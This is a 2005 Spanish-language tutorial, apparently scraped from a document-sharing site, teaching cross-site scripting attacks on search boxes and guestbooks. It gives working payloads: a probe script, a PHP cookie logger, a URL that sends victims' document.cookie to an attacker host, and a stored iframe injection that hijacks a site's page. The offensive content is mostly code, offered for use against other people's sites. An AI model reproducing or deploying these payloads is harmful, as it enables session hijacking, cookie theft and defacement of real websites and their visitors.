Sunteți pe pagina 1din 2

############################################################################

\* Http://WwW.YaNKeeZoft.Org */ | Cross Site Scripting Atack


############################################################################
\* Escrito por: YaNKee [ elyankee@gmail.com ]
############################################################################

Hay dos formas para poder usar este ataque: a un buscador, o a otro tipo de form
ulario (un libro de visitas o un tag por ejemplo)
Buscador:
Lo primero encontrar un buscador, para saber si es vulnerable introducir el sigu
iente cdigo:
<script>alert(hola)</script>
Si es vulnerables, saldr un ventana que pondr hola, en caso contrario no saldr nada
.
Si vulnerable, el siguiente paso es ver el name del buscador y del botn de bsqued
a.
<input type="text" name="palabra"> que ser el formulario.
<input type="submit" name="buscar" value="Buscar"> que ser el boton.

La caja de texto donde ponemos lo que vamos a buscar se llama palabra y el botn b
uscar.

Ahora lo que hay que hacer es almacenar las cookies en un archivo d texto para e
llo creamos un archivo PHP que contenga el siguiente cdigo.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=cookies.php-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Cdigo:
##################################
# <? #
# $cookie = $_GET['cookie']; #
# $fff = fopen("cookie.txt","a");#
# fwrite($fff, "$cookie \n"); #
# fclose($fff); #
# ?> #
##################################
lo que hace este cdigo es guardar la cookie en un archivo txt que se llama cookie
.txt.

Una vez hecho este paso solo tenemos que crear URL que ejecute a cookie.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=-=-=-=-=-= | * Cdigo: * | =-=-=-=-=-=


http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
'http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

=-=-=-=-=-= | * Formulario: * | =-=-=-=-=-=


Buscamos un libro de visitas o un tag y probamos que sea vulnerable:
#############################
<script>alert(hola)</script>
#############################
Si es vulnerable, creamos un archivo PHP que se llama owned.php (por ejemplo) y
introducimos el siguiente cdigo (ademas de lo que se quiera poner en el nuevo in
dex) en fichero owned:
##################################
<SCRIPT TYPE="text/javascript" LANGUAGE=JAVASCRIPT>
<!--
if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT>
##################################
Este codigo hace que se el IFRAME la pagina principal. Despues en la caja de tex
to del formularios vulnerable ponemos lo suiguiente:
<iframe src=http://www.atacante.org/owned.php>
Con esto hacemos que cuando alguien linkea a el formulario automaticamenta carga
nuestro owned.php y lo pone como pagina principal.

######################################################################
Copyright 2005 YaNKee Zoft - No modificar sin permiso de su autor

Texto de libre Distribucion No Cambiar los datos del Autor


########################################################################

S-ar putea să vă placă și